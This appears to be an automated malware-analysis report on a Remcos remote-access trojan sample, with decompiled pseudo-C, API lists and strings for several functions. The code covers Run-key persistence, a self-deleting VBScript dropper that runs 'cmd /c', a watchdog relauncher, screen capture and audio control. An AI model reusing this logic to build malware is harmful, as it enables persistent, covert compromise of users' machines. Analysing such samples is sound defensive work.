CreateCompatibleBitmap.GDI32(00000000,?,00000000), ref: 004143F4
DeleteDC.GDI32(00000000), ref: 00414408
DeleteDC.GDI32(00000000), ref: 0041440B
DeleteObject.GDI32(?), ref: 0041440F
SelectObject.GDI32(00000000,00000000), ref: 00414419
DeleteDC.GDI32(00000000), ref: 0041442A
DeleteDC.GDI32(00000000), ref: 0041442D
StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 00414469
GetCursorInfo.USER32(?,?,?), ref: 00414484
GetIconInfo.USER32(?,?), ref: 00414498
DeleteObject.GDI32(?), ref: 004144BD
DeleteObject.GDI32(?), ref: 004144C6
DrawIcon.USER32 ref: 004144D5
GetObjectA.GDI32(?,00000018,?), ref: 004144E9
LocalAlloc.KERNEL32(00000040,00000001,?,?), ref: 0041454F
GlobalAlloc.KERNEL32(00000000,?,?,?), ref: 004145B8
GetDIBits.GDI32(00000000,?,00000000,?,00000000,00000000,00000000), ref: 004145DC
DeleteDC.GDI32(?), ref: 004145EF
DeleteDC.GDI32(00000000), ref: 004145F2
DeleteObject.GDI32(?), ref: 004145F7
GlobalFree.KERNEL32 ref: 00414601
DeleteObject.GDI32(?), ref: 004146A6
GlobalFree.KERNEL32 ref: 004146AD
DeleteDC.GDI32(?), ref: 004146BC
DeleteDC.GDI32(00000000), ref: 004146BF

Strings

>@A, xrefs: 0041445B, 004144BA
DISPLAY, xrefs: 00414393

Memory Dump Source

Source File: 00000001.00000001.663167910.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.663464805.000000000046E000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: Delete$Object$Info$CreateGlobal$AllocCompatibleFreeIconMonitor$BitmapBitsCursorDrawLocalSelectStretch
String ID: >@A$DISPLAY
API String ID: 517350757-2500656761
Opcode ID: 25f7558eca949e19bafa82d7b284ec564094a12f981cd1b0e445771a6fda2487
Instruction ID: ec1a01cc7f4559ec5f2a1f2d6e44a1d80d5ab7ce16bf012834f82372683c874d
Opcode Fuzzy Hash: 25f7558eca949e19bafa82d7b284ec564094a12f981cd1b0e445771a6fda2487
Instruction Fuzzy Hash: 33B1B371A00219AFDB10DFA0DD45BEEBBB9EF45711F00402AFA05E7291DB74AA45CF58

Uniqueness

Uniqueness Score: -1.00%

Function 0040B082, Relevance: 40.5, APIs: 6, Strings: 17, Instructions: 280
registryCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E0040B082(char _a4) {
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				char _v148;
				char _v172;
				short _v692;
				void* __ebx;
				void* __edi;
				void* __ebp;
				void* _t53;
				void* _t54;
				void* _t57;
				signed int _t61;
				void* _t62;
				void* _t78;
				void* _t79;
				void* _t92;
				void* _t93;
				signed char _t134;
				void* _t243;
				void* _t245;
				void* _t246;
				void* _t247;

				L0040F9AE();
				if( *0x4699d0 != 0x30) {
					L00409A42();
				}
				_t243 =  *0x46ae9c - 1; // 0x0
				if(_t243 == 0) {
					L00414DF7(_t243);
				}
				if( *0x46aa75 != 0) {
					E004170D3(L00401E4F(0x46b0d8));
				}
				_t231 = L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\";
				_t245 =  *0x46ab06 - 1; // 0x1
				if(_t245 == 0) {
					L0041061C(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", L00401E4F(0x46b4c8));
				}
				_t246 =  *0x46aaff - 1; // 0x0
				if(_t246 == 0) {
					L0041061C(0x80000002, _t231, L00401E4F(0x46b4c8));
				}
				_t247 =  *0x46ab04 - 1; // 0x0
				if(_t247 == 0) {
					L0041061C(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", L00401E4F(0x46b4c8));
				}
				_t53 = E004023D3();
				_t54 = L00401EF9(0x46b540);
				_t57 = E004102F0(L00401EF9(0x46b4f8), "exepath",  &_v692, 0x208, _t54, _t53);
				_t248 = _t57;
				if(_t57 == 0) {
					GetModuleFileNameW(0,  &_v692, 0x208);
				}
				RegDeleteKeyA(0x80000001, L00401EF9(0x46b4f8));
				_t61 = SetFileAttributesW( &_v692, 0x80);
				_t140 = 0x46b510;
				asm("sbb bl, bl");
				_t134 =  ~_t61 & 0x00000001;
				_t62 = E0040701B(_t248);
				_t249 = _t62;
				if(_t62 != 0) {
					_t140 = 0x46b510;
					SetFileAttributesW(L00401E4F(0x46b510), 0x80);
				}
				L00402F9A(_t134,  &_v124, E0040412C(_t134,  &_v52, L00438F0F(_t134, _t140, _t249, L"Temp")), 0, _t249, L"\\update.vbs");
				L00401E54();
				E004042DF(_t134,  &_v28, L"On Error Resume Next\n", _t249, E0040412C(_t134,  &_v52, L"Set fso = CreateObject(\"Scripting.FileSystemObject\")\n"));
				L00401E54();
				_t250 = _t134;
				if(_t134 != 0) {
					E00403205(L00402F9A(_t134,  &_v52, E004042DF(_t134,  &_v76, L"while fso.FileExists(\"", _t250, E0040412C(_t134,  &_v100,  &_v692)), 0, _t250, L"\")\n"));
					L00401E54();
					L00401E54();
					L00401E54();
				}
				E00403205(L00402F9A(_t134,  &_v100, L00402F9A(_t134,  &_v76, E0040412C(_t134,  &_v52, L"fso.DeleteFile \""), 0, _t250,  &_v692), 0, _t250, L"\"\n"));
				L00401E54();
				L00401E54();
				L00401E54();
				_t251 = _t134;
				if(_t134 != 0) {
					E0040720A(_t134,  &_v28, 0, L"wend\n");
				}
				_t78 = E0040701B(_t251);
				_t252 = _t78;
				if(_t78 != 0) {
					E00403205(L00402F9A(0x464a0c,  &_v100, L0040B61A( &_v76, L"fso.DeleteFolder \"", _t252, 0x46b510), 0, _t252, L"\"\n"));
					L00401E54();
					L00401E54();
				}
				_t79 = E0040412C(0x464a0c,  &_v172, L"\"\"\", 0");
				E00403205(L00402F9A(0x464a0c,  &_v100, L00402F24( &_v76, E00404303(0x464a0c,  &_v52, E0040412C(0x464a0c,  &_v148, L"CreateObject(\"WScript.Shell\").Run \"cmd /c \"\""), _t252,  &_a4), _t79), 0, _t252, "\n"));
				L00401E54();
				L00401E54();
				L00401E54();
				L00401E54();
				L00401E54();
				E0040720A(0x464a0c,  &_v28, 0, L"fso.DeleteFile(Wscript.ScriptFullName)");
				_t92 = L00401E4F( &_v124);
				_t93 = E004023D3();
				if(E004172C6(L00401E4F( &_v28), _t93 + _t93, _t92, 0) != 0 && ShellExecuteW(0, L"open", L00401E4F( &_v124), 0x464a0c, 0x464a0c, 0) > 0x20) {
					ExitProcess(0);
				}
				L00401E54();
				L00401E54();
				return L00401E54();
			}

0x0040b08e
0x0040b09a
0x0040b09c
0x0040b09c
0x0040b0a4
0x0040b0aa
0x0040b0ac
0x0040b0ac
0x0040b0b8
0x0040b0c6
0x0040b0c6
0x0040b0d0
0x0040b0d5
0x0040b0db
0x0040b0ec
0x0040b0f1
0x0040b0f2
0x0040b0f8
0x0040b109
0x0040b10e
0x0040b10f
0x0040b115
0x0040b129
0x0040b12e
0x0040b136
0x0040b13e
0x0040b164
0x0040b16e
0x0040b170
0x0040b17b
0x0040b17b
0x0040b18e
0x0040b1a6
0x0040b1b1
0x0040b1b6
0x0040b1b8
0x0040b1bb
0x0040b1c0
0x0040b1c2
0x0040b1c9
0x0040b1d4
0x0040b1d4
0x0040b1f4
0x0040b1fd
0x0040b218
0x0040b221
0x0040b226
0x0040b228
0x0040b25c
0x0040b264
0x0040b26c
0x0040b274
0x0040b274
0x0040b2ac
0x0040b2b4
0x0040b2bc
0x0040b2c4
0x0040b2c9
0x0040b2cb
0x0040b2d5
0x0040b2d5
0x0040b2e8
0x0040b2ed
0x0040b2ef
0x0040b314
0x0040b31c
0x0040b324
0x0040b324
0x0040b339
0x0040b378
0x0040b380
0x0040b388
0x0040b390
0x0040b39b
0x0040b3a6
0x0040b3b3
0x0040b3bc
0x0040b3c5
0x0040b3e3
0x0040b403
0x0040b403
0x0040b40c
0x0040b414
0x0040b427

APIs

Part of subcall function 0040F9AE: TerminateProcess.KERNEL32(00000000,0046B4E0,0040D3A4), ref: 0040F9BE
Part of subcall function 0040F9AE: WaitForSingleObject.KERNEL32(000000FF), ref: 0040F9D1

GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040B17B
RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040B18E
SetFileAttributesW.KERNEL32(?,00000080), ref: 0040B1A6
SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040B1D4

Part of subcall function 00409A42: TerminateThread.KERNEL32(0040830D,00000000,0046B4E0,0040AD43,?,0046B4F8,0046B4E0), ref: 00409A51
Part of subcall function 00409A42: UnhookWindowsHookEx.USER32(000403B7), ref: 00409A61
Part of subcall function 00409A42: TerminateThread.KERNEL32(004082F2,00000000,?,0046B4F8,0046B4E0), ref: 00409A73

Part of subcall function 004172C6: CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00464A0C,00000000,00000000,?,0040B05C,00000000,00000000), ref: 00417305

ShellExecuteW.SHELL32(00000000,open,00000000,00464A0C,00464A0C,00000000), ref: 0040B3F7
ExitProcess.KERNEL32 ref: 0040B403

Strings

exepath, xrefs: 0040B156
Set fso = CreateObject("Scripting.FileSystemObject"), xrefs: 0040B202
\update.vbs, xrefs: 0040B1D6
Temp, xrefs: 0040B1DB
"), xrefs: 0040B22A
wend, xrefs: 0040B2CD
open, xrefs: 0040B3F1
Remcos, xrefs: 0040B0CB
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 0040B11F
CreateObject("WScript.Shell").Run "cmd /c "", xrefs: 0040B343
fso.DeleteFolder ", xrefs: 0040B2F7
fso.DeleteFile(Wscript.ScriptFullName), xrefs: 0040B3AB
while fso.FileExists(", xrefs: 0040B23F
fso.DeleteFile ", xrefs: 0040B285
Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 0040B0D0
On Error Resume Next, xrefs: 0040B210
""", 0, xrefs: 0040B32E

Memory Dump Source

Source File: 00000001.00000001.663167910.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.663464805.000000000046E000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
String ID: """, 0$")$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Remcos$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
API String ID: 1861856835-219127200
Opcode ID: 58293453395cb6562f363f07e6cb0559c8fbc3cada0ab80d04e2c1b325a3309c
Instruction ID: 8e0adb38973effbbd76882bb506aa248701c49a596ef42eff7616b6c34ce1a52
Opcode Fuzzy Hash: 58293453395cb6562f363f07e6cb0559c8fbc3cada0ab80d04e2c1b325a3309c
Instruction Fuzzy Hash: DE913A71A002185ACB09F7A2D856AEE7769AF50708F14007FF906B71E3EF781D8D869D

Uniqueness

Uniqueness Score: -1.00%

Function 0040F5E8, Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 181
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E0040F5E8() {
				long _v8;
				char _v32;
				short _v556;
				short _v1076;
				short _v1596;
				short _v2116;
				void* _t27;
				void* _t28;
				void* _t31;
				long _t37;
				int _t41;
				long _t50;
				void* _t55;
				void* _t68;
				void* _t70;
				int _t71;
				void* _t72;
				long _t73;
				void* _t110;
				void* _t112;
				void* _t115;
				void* _t116;

				_t71 = 0;
				_v8 = _t73;
				CreateMutexA(0, 1, "Mutex_RemWatchdog");
				GetModuleFileNameW(0,  &_v2116, 0x104);
				_t27 = E004023D3();
				_t28 = E00401EF9(0x46b540);
				_t108 = 0x46b4f8;
				_t31 = E004102F0(E00401EF9(0x46b4f8), "exepath",  &_v556, 0x208, _t28, _t27);
				_t116 = _t115 + 0x14;
				if(_t31 != 0) {
					E0040201F(0,  &_v32);
					if(E0041735B( &_v556,  &_v32) == 0) {
						goto L1;
					}
					_t110 = OpenProcess(0x100000, 0, _v8);
					WaitForSingleObject(_t110, 0xffffffff);
					CloseHandle(_t110);
					_t37 = GetCurrentProcessId();
					if(E00410470(0x46b4f8, E00401EF9(0x46b4f8), "WDH", _t37) == 0) {
						L18:
						_push(1);
						L2:
						ExitProcess();
					}
					_t108 = ShellExecuteW;
					do {
						_t41 = PathFileExistsW( &_v556);
						_t42 =  &_v556;
						if(_t41 != 0) {
							L11:
							ShellExecuteW(_t71, L"open", _t42, _t71, _t71, 1);
							L12:
							do {
								_t72 = E00410145(E00401EF9(0x46b4f8), "WD",  &_v8);
								_t122 = _t72;
								if(_t72 == 0) {
									Sleep(0x1f4);
								} else {
									E004105A2(E00401EF9(0x46b4f8), _t122, "WD");
								}
							} while (_t72 == 0);
							goto L17;
						}
						_t55 = E004023D3();
						if(E004172C6(E00401EF9( &_v32), _t55,  &_v556, _t71) == 0) {
							E004315B0(_t108,  &_v1596, _t71, 0x208);
							_t116 = _t116 + 0xc;
							GetTempPathW(0x104,  &_v1596);
							GetTempFileNameW( &_v1596, L"temp_", _t71,  &_v1076);
							lstrcatW( &_v1076, L".exe");
							_t68 = E004023D3();
							_t70 = E004172C6(E00401EF9( &_v32), _t68,  &_v1076, _t71);
							__eflags = _t70;
							if(_t70 == 0) {
								goto L12;
							}
							_t42 =  &_v1076;
							goto L11;
						}
						_t42 =  &_v556;
						goto L11;
						L17:
						_t71 = 0;
						_t112 = OpenProcess(0x100000, 0, _v8);
						WaitForSingleObject(_t112, 0xffffffff);
						CloseHandle(_t112);
						_t50 = GetCurrentProcessId();
					} while (E00410470(0x46b4f8, E00401EF9(0x46b4f8), "WDH", _t50) != 0);
					goto L18;
				}
				L1:
				_push(_t71);
				goto L2;
			}

0x0040f5fb
0x0040f5fd
0x0040f601
0x0040f614
0x0040f621
0x0040f629
0x0040f63a
0x0040f64e
0x0040f653
0x0040f658
0x0040f664
0x0040f679
0x00000000
0x00000000
0x0040f68a
0x0040f68f
0x0040f696
0x0040f69c
0x0040f6ba
0x0040f831
0x0040f831
0x0040f65b
0x0040f65b
0x0040f65b
0x0040f6c0
0x0040f6c6
0x0040f6cd
0x0040f6d5
0x0040f6db
0x0040f791
0x0040f79c
0x0040f79e
0x0040f7a3
0x0040f7ba
0x0040f7be
0x0040f7c0
0x0040f7dd
0x0040f7c2
0x0040f7d0
0x0040f7d5
0x0040f7e3
0x00000000
0x0040f7a3
0x0040f6e6
0x0040f702
0x0040f71c
0x0040f721
0x0040f730
0x0040f74a
0x0040f75c
0x0040f76d
0x0040f780
0x0040f787
0x0040f789
0x00000000
0x00000000
0x0040f78b
0x00000000
0x0040f78b
0x0040f704
0x00000000
0x0040f7e7
0x0040f7ea
0x0040f7f8
0x0040f7fd
0x0040f804
0x0040f80a
0x0040f829
0x00000000
0x0040f6c6
0x0040f65a
0x0040f65a
0x00000000

APIs

CreateMutexA.KERNEL32(00000000,00000001,Mutex_RemWatchdog,0046B558,0046B4F8,00000000), ref: 0040F601
GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040F614

Part of subcall function 004102F0: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,0046B4F8), ref: 0041030C
Part of subcall function 004102F0: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 00410325
Part of subcall function 004102F0: RegCloseKey.ADVAPI32(00000000), ref: 00410330

ExitProcess.KERNEL32 ref: 0040F65B
OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 0040F684
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0040F68F
CloseHandle.KERNEL32(00000000), ref: 0040F696
GetCurrentProcessId.KERNEL32 ref: 0040F69C
PathFileExistsW.SHLWAPI(?), ref: 0040F6CD
ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0040F79C
OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 0040F7F2
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0040F7FD
CloseHandle.KERNEL32(00000000), ref: 0040F804
GetCurrentProcessId.KERNEL32 ref: 0040F80A

Strings

temp_, xrefs: 0040F73E
WDH, xrefs: 0040F6A3, 0040F811
exepath, xrefs: 0040F640
.exe, xrefs: 0040F750
open, xrefs: 0040F796
Mutex_RemWatchdog, xrefs: 0040F5F4

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Process$CloseOpen$CurrentFileHandleObjectSingleWait$CreateExecuteExistsExitModuleMutexNamePathQueryShellValue
String ID: .exe$Mutex_RemWatchdog$WDH$exepath$open$temp_
API String ID: 2645874385-232273909
Opcode ID: 68e4d2fe13f13f285b4f5c6cf8f657e6e15795c8966c5a8f2536f4af9485366a
Instruction ID: 428a120c8336d12d410381d2c74e812c7dd665733c8a56394027d7a97aa51211
Opcode Fuzzy Hash: 68e4d2fe13f13f285b4f5c6cf8f657e6e15795c8966c5a8f2536f4af9485366a
Instruction Fuzzy Hash: AE51B571940305ABDB10B7A1DC49EEE336C9B45719F10407BFA01A71D2EFBC9E898A5D

Uniqueness

Uniqueness Score: -1.00%

Function 00416407, Relevance: 38.7, APIs: 12, Strings: 10, Instructions: 185
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00416407(void* __ecx, void* __edx, char _a4) {
				char _v24;
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t25;
				void* _t28;
				void* _t43;
				void* _t60;
				void* _t63;
				void* _t67;
				CHAR* _t89;
				void* _t109;
				CHAR* _t110;
				void* _t111;
				void* _t114;
				void* _t118;

				_t103 = __edx;
				_t67 = __ecx;
				_t109 = __edx;
				if(L0041664D( &_a4, __ecx, __ecx) == 0xffffffff) {
					_t63 = L00401E4F( &_a4);
					_t103 = 0x30;
					L00401E5E( &_a4, 0x30, _t111, E004179DE( &_v28, 0x30, _t63));
					L00401E54();
				}
				_t25 = E004023D3();
				_t120 = _t25;
				if(_t25 == 0) {
					__eflags = PathFileExistsW(L00401E4F( &_a4));
					if(__eflags != 0) {
						goto L4;
					} else {
						L00401FCE(_t67, _t114 - 0x18, 0x45e65c);
						_push(0xa8);
						L0040495D(_t67, 0x46b9e0, _t103, __eflags);
					}
				} else {
					_t60 = L00401E4F( &_a4);
					_t118 = _t114 - 0x18;
					E00402036(_t67, _t118, _t103, _t120, _t109);
					E004173CD(_t60);
					_t114 = _t118 + 0x18;
					L4:
					_t28 = L00416CBE( &_v124, _t67, _t120);
					_t108 = L00402F24( &_v28, L00402F9A(_t67,  &_v76, L0040B61A( &_v100, L"open \"", _t120,  &_a4), _t109, _t120, L"\" type "), _t28);
					L00402F9A(_t67,  &_v52, _t32, _t109, _t120, L" alias audio");
					L00401E54();
					L00401E54();
					L00401E54();
					L00401E54();
					mciSendStringW(L00401E4F( &_v52), 0, 0, 0);
					mciSendStringA("play audio", 0, 0, 0);
					_t115 = _t114 - 0x18;
					L00401FCE(0, _t114 - 0x18, 0x45e65c);
					_push(0xa9);
					L0040495D(0, 0x46b9e0, _t32, 0);
					_t43 = CreateEventA(0, 1, 0, 0);
					while(1) {
						L5:
						 *0x46aea4 = _t43;
						while(1) {
							_t122 = _t43;
							if(_t43 == 0) {
								break;
							}
							__eflags =  *0x46ae9f; // 0x0
							if(__eflags != 0) {
								mciSendStringA("pause audio", 0, 0, 0);
								 *0x46ae9f = 0;
							}
							__eflags =  *0x46ae9e; // 0x0
							if(__eflags != 0) {
								mciSendStringA("resume audio", 0, 0, 0);
								 *0x46ae9e = 0;
							}
							mciSendStringA("status audio mode",  &_v24, 0x14, 0);
							_t108 =  &_v24;
							_t110 = "stopped";
							_t89 = 0;
							while(1) {
								__eflags = ( *(_t108 + _t89) & 0x000000ff) -  *((intOrPtr*)(_t110 + _t89));
								if(( *(_t108 + _t89) & 0x000000ff) !=  *((intOrPtr*)(_t110 + _t89))) {
									break;
								}
								_t89 = _t89 + 1;
								__eflags = _t89 - 8;
								if(_t89 != 8) {
									continue;
								} else {
									SetEvent( *0x46aea4);
								}
								break;
							}
							__eflags = WaitForSingleObject( *0x46aea4, 0x1f4);
							if(__eflags != 0) {
								_t43 =  *0x46aea4; // 0x0
							} else {
								CloseHandle( *0x46aea4);
								_t43 = 0;
								goto L5;
							}
						}
						mciSendStringA("stop audio", 0, 0, 0);
						mciSendStringA("close audio", 0, 0, 0);
						L00401FCE(0, _t115 - 0x18, 0x45e65c);
						_push(0xaa);
						L0040495D(0, 0x46b9e0, _t108, _t122);
						L00401E54();
						goto L21;
					}
				}
				L21:
				return L00401E54();
			}

0x00416407
0x00416411
0x00416413
0x00416421
0x00416426
0x0041642c
0x0041643b
0x00416443
0x00416443
0x0041644a
0x00416452
0x00416454
0x00416541
0x00416543
0x00000000
0x00416549
0x00416553
0x00416558
0x00416562
0x00416562
0x0041645a
0x0041645a
0x0041645f
0x00416467
0x0041646e
0x00416473
0x00416476
0x00416480
0x004164b3
0x004164b8
0x004164c1
0x004164c9
0x004164d1
0x004164d9
0x004164ec
0x00416500
0x00416502
0x0041650c
0x00416511
0x0041651b
0x00416525
0x0041652b
0x0041652b
0x0041652b
0x004165fc
0x004165fc
0x004165fe
0x00000000
0x00000000
0x0041656c
0x00416572
0x0041657c
0x0041657e
0x0041657e
0x00416584
0x0041658a
0x00416594
0x00416596
0x00416596
0x004165a8
0x004165aa
0x004165ad
0x004165b2
0x004165b4
0x004165b8
0x004165bb
0x00000000
0x00000000
0x004165bd
0x004165be
0x004165c1
0x00000000
0x004165c3
0x004165c9
0x004165c9
0x00000000
0x004165c1
0x004165e0
0x004165e2
0x004165f7
0x004165e4
0x004165ea
0x004165f0
0x00000000
0x004165f0
0x004165e2
0x0041660c
0x00416616
0x00416622
0x00416627
0x00416631
0x00416639
0x00000000
0x00416639
0x0041652b
0x0041663e
0x0041664c

APIs

mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 004164EC
mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 00416500
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,Function_0005E65C), ref: 00416525
PathFileExistsW.SHLWAPI(00000000,00000000,00000000,?,00000000,0046B218), ref: 0041653B
mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041657C
mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 00416594
mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 004165A8
SetEvent.KERNEL32 ref: 004165C9
WaitForSingleObject.KERNEL32(000001F4), ref: 004165DA
CloseHandle.KERNEL32 ref: 004165EA
mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041660C
mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 00416616

Strings

stopped, xrefs: 004165AD
resume audio, xrefs: 0041658F
status audio mode, xrefs: 004165A3
close audio, xrefs: 00416611
" type , xrefs: 0041648E
pause audio, xrefs: 00416577
open ", xrefs: 00416489
play audio, xrefs: 004164FB
stop audio, xrefs: 00416607
alias audio, xrefs: 00416476

Memory Dump Source

Source File: 00000001.00000001.663167910.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.663464805.000000000046E000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped
API String ID: 738084811-1354618412
Opcode ID: 36aeeccb01ec02f3dac8a288f08fd19f20beea8af35b702eb82d14c4469ba48c
Instruction ID: 150d1fbf3c410ab8e4fb3d6209085702d6037804611513764ddd0402fb43ed4f
Opcode Fuzzy Hash: 36aeeccb01ec02f3dac8a288f08fd19f20beea8af35b702eb82d14c4469ba48c
Instruction Fuzzy Hash: 8C51C5716402087ADB04B7B5DD92DFF3A2D9F41748B10003FF506661E2EE795D898AAE

Uniqueness

Uniqueness Score: -1.00%

Function 0040AD24, Relevance: 37.0, APIs: 6, Strings: 15, Instructions: 259
registryCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E0040AD24() {
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				char _v148;
				short _v668;
				void* _t49;
				void* _t50;
				void* _t53;
				void* _t56;
				void* _t82;
				void* _t84;
				void* _t85;
				signed char _t123;
				signed char _t124;
				void* _t227;
				void* _t229;
				void* _t230;
				void* _t231;

				E0040F9AE();
				if( *0x4699d0 != 0x30) {
					E00409A42();
				}
				_t227 =  *0x46ae9c - 1; // 0x0
				if(_t227 == 0) {
					E00414DF7(_t227);
				}
				if( *0x46aa75 != 0) {
					E004170D3(E00401E4F(0x46b0d8));
				}
				_t214 = L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\";
				_t229 =  *0x46ab06 - 1; // 0x1
				if(_t229 == 0) {
					E0041061C(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", E00401E4F(0x46b4c8));
				}
				_t230 =  *0x46aaff - 1; // 0x0
				if(_t230 == 0) {
					E0041061C(0x80000002, _t214, E00401E4F(0x46b4c8));
				}
				_t231 =  *0x46ab04 - 1; // 0x0
				if(_t231 == 0) {
					E0041061C(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", E00401E4F(0x46b4c8));
				}
				E004315B0(0,  &_v668, 0, 0x208);
				_t49 = E004023D3();
				_t50 = E00401EF9(0x46b540);
				_t53 = E004102F0(E00401EF9(0x46b4f8), "exepath",  &_v668, 0x208, _t50, _t49);
				_t232 = _t53;
				if(_t53 == 0) {
					GetModuleFileNameW(0,  &_v668, 0x208);
				}
				RegDeleteKeyA(0x80000001, E00401EF9(0x46b4f8));
				_t56 = E0040701B(_t232);
				_t233 = _t56;
				if(_t56 != 0) {
					SetFileAttributesW(E00401E4F(0x46b510), 0x80);
				}
				_t123 =  ~(SetFileAttributesW( &_v668, 0x80));
				asm("sbb bl, bl");
				E00402F9A(_t123,  &_v148, E00416CBE( &_v76, E00416A77( &_v28), _t233), 0, _t233, L".vbs");
				E00401E54();
				E00401F11();
				E00404303(_t123,  &_v124, E00402F9A(_t123,  &_v28, E0040412C(_t123,  &_v76, E00438F0F(_t123,  &_v28, _t233, L"Temp")), 0, _t233, "\\"), _t233,  &_v148);
				E00401E54();
				E00401E54();
				E004042DF(_t123,  &_v52, L"On Error Resume Next\n", _t233, E0040412C(_t123,  &_v28, L"Set fso = CreateObject(\"Scripting.FileSystemObject\")\n"));
				E00401E54();
				_t124 = _t123 & 0x00000001;
				_t234 = _t124;
				if(_t124 != 0) {
					E00403205(E00402F9A(_t124,  &_v28, E004042DF(_t124,  &_v76, L"while fso.FileExists(\"", _t234, E0040412C(_t124,  &_v100,  &_v668)), 0, _t234, L"\")\n"));
					E00401E54();
					E00401E54();
					E00401E54();
				}
				E00403205(E00402F9A(_t124,  &_v100, E00402F9A(_t124,  &_v28, E0040412C(_t124,  &_v76, L"fso.DeleteFile \""), 0, _t234,  &_v668), 0, _t234, L"\"\n"));
				E00401E54();
				E00401E54();
				E00401E54();
				_t235 = _t124;
				if(_t124 != 0) {
					E0040720A(_t124,  &_v52, 0, L"wend\n");
				}
				_t82 = E0040701B(_t235);
				_t236 = _t82;
				if(_t82 != 0) {
					E00403205(E00402F9A(0x464a0c,  &_v100, E0040B61A( &_v28, L"fso.DeleteFolder \"", _t236, 0x46b510), 0, _t236, L"\"\n"));
					E00401E54();
					E00401E54();
				}
				E0040720A(0x464a0c,  &_v52, 0, L"fso.DeleteFile(Wscript.ScriptFullName)");
				_t84 = E00401E4F( &_v124);
				_t85 = E004023D3();
				if(E004172C6(E00401E4F( &_v52), _t85 + _t85, _t84, 0) != 0) {
					ShellExecuteW(0, L"open", E00401E4F( &_v124), 0x464a0c, 0x464a0c, 0);
				}
				ExitProcess(0);
			}

0x0040ad30
0x0040ad3c
0x0040ad3e
0x0040ad3e
0x0040ad46
0x0040ad4c
0x0040ad4e
0x0040ad4e
0x0040ad5a
0x0040ad68
0x0040ad68
0x0040ad72
0x0040ad77
0x0040ad7d
0x0040ad8e
0x0040ad93
0x0040ad94
0x0040ad9a
0x0040adab
0x0040adb0
0x0040adb1
0x0040adb7
0x0040adcb
0x0040add0
0x0040ade1
0x0040adf0
0x0040adf8
0x0040ae19
0x0040ae21
0x0040ae23
0x0040ae2e
0x0040ae2e
0x0040ae41
0x0040ae53
0x0040ae5e
0x0040ae60
0x0040ae6f
0x0040ae6f
0x0040ae84
0x0040ae8b
0x0040aea4
0x0040aead
0x0040aeb5
0x0040aeea
0x0040aef3
0x0040aefb
0x0040af16
0x0040af1f
0x0040af24
0x0040af24
0x0040af27
0x0040af5b
0x0040af63
0x0040af6b
0x0040af73
0x0040af73
0x0040afab
0x0040afb3
0x0040afbb
0x0040afc3
0x0040afc8
0x0040afca
0x0040afd4
0x0040afd4
0x0040afe7
0x0040afec
0x0040afee
0x0040b013
0x0040b01b
0x0040b023
0x0040b023
0x0040b030
0x0040b039
0x0040b042
0x0040b060
0x0040b074
0x0040b074
0x0040b07b

APIs

Part of subcall function 0040F9AE: TerminateProcess.KERNEL32(00000000,0046B4E0,0040D3A4), ref: 0040F9BE
